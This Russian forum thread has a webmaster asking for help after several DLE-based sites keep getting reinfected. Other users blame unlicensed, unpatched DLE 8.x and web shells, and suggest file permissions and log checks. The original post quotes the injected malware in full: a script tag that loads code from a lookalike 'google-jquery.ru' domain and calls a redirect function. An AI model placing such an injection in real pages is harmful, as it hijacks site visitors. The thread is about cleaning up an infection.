Левый ява на ДЛЕ

H
На сайте с 18.12.2010
Offline
32
667

Короче, какой-то сцука разместил внизу на нескольких моих сайтах на ДЛЕ:

<!--x813n--><script type="text/javascript" src='http://google-jquery.ru/jquery.js'></script>
<script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script><!--/x813n-->

Снес эту хрень, на следующий день оно снова в строю :madd:

Снес, поменял пасс от фтп, пасс админа - на следующий день опять появилось. :madd:

Снес, поменял пасс админа, фтп, юзера базы, проверил все корень на наличие левого - нашел левую папку и пару левых файлов все снес к чертовой матери. Зараза опять появилась на след день. :madd:

Снес, поменял опять пасс админа, перенес на другой хост (со сменой пароля фтп и пользователя БД). Опять есть :madd::madd::madd:

Сайты так ничего из себя не представляют, тупо висят, но все же... Но блин, естественно, бесит...

Может кто сталкивался, и знает в чем дело.. Ну не ломают же их все спецом каждый день... Тем боле что все похоже на то, что делается это автоматом, т.к майн заменяется на корявый каждый раз, из-за чего у одного из сайтов лезет диз.

Комментарии для ваших сайтов (/ru/forum/772278) | Автоматические WM кредиты (http://wmcoin.com/?x=RBNRPVEVNRZR)
eis
На сайте с 18.10.2008
Offline
473
eis
#1

heialo, DLE лицензия? Какая версия? Проверяйте на шеллы

- Здесь я покупаю вечные ссылки на свои сайты! (https://backlinkator.com) - сотни ссылок за копейки
Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#2

Конечно автоматом.

Вы хоть в космос сайт спрячьте. Вы вместе с ним переносите зараженные файлы

Попробуйте это для начала.

Скорей всего где-то есть дыра:)

Ваш КО

Подпись))
H
На сайте с 18.12.2010
Offline
32
#3

eis, ДЛЕ не лицензия, половину этих сайтов я купил под траф в свое время. Версия 8,3-8,5

Ну я хост поменял даже. Т.к грешил на него (все сайты что ломались были на нем). Но..

eis
На сайте с 18.10.2008
Offline
473
eis
#4
heialo:
ДЛЕ не лицензия, половину этих сайтов я купил под траф в свое время. Версия 8,3-8,5

Вот и причина. ДЛЕ нелицензия + версия 8,3-8,5. И конечно же не ставились заплатки от уязвимостей?

Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#5

Тут в 9.* дыр уже нашли под 2 мульона(я приврал), а Вы удивляетесь что 8.* хакнули:)

[Удален]
#6
heialo:
eis, ДЛЕ не лицензия, половину этих сайтов я купил под траф в свое время. Версия 8,3-8,5
Ну я хост поменял даже. Т.к грешил на него (все сайты что ломались были на нем). Но..

Дак хоста можно менять хоть 10 раз - вы файлы переносите все свои, которые заражены, и вирусы будут появляться хоть где. Как тут выше сказали - хоть в космос сайт унесите. Проверяйте файлы, например index.php (очень часто у зараженных сайтов в конце этого файла можно обнаружить левый код, который и генерирует вирус), но не факт, бывают и в других файлах.

siv1987
На сайте с 02.04.2009
Offline
427
#7
zharinov
На сайте с 26.02.2010
Offline
87
#8

А в каком файле дописывается скрипт? Поставьте права без права записи (только исполнение). Хотя это конечно не решение проблемы, но если вы даже ЦМС не обновляете, то думаю вам это решение в самый раз ))

Ремонт автомобиля своими руками (http://delay-auto.ru) Сайт молодого художника (http://tvoirisynki.net.ua)
H
На сайте с 18.12.2010
Offline
32
#9

main.tpl в самом низу в пределах бади.

пробовал скриптом который показал Милованов Ю.С, проверил по тем местам что скрипт считает что шелл есть - ничего там нету...

Пока поменял все что мог, посмотрю что завтра будет...

zharinov
На сайте с 26.02.2010
Offline
87
#10

Поставьте для него права 444. (Хотя зачастую инфицируется много файлов) Я так понимаю ломают не фтп... А где-то гадость в самом движке. Так он не сможет именно в этот файл ничего записать и изменить...

И ещё гляньте по логам, какие файлы были изменены в дату взлома. Если лень искать в них каку, перезалейте с чистого движка.

Зачастую инфицируют Index.php и htaccess.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий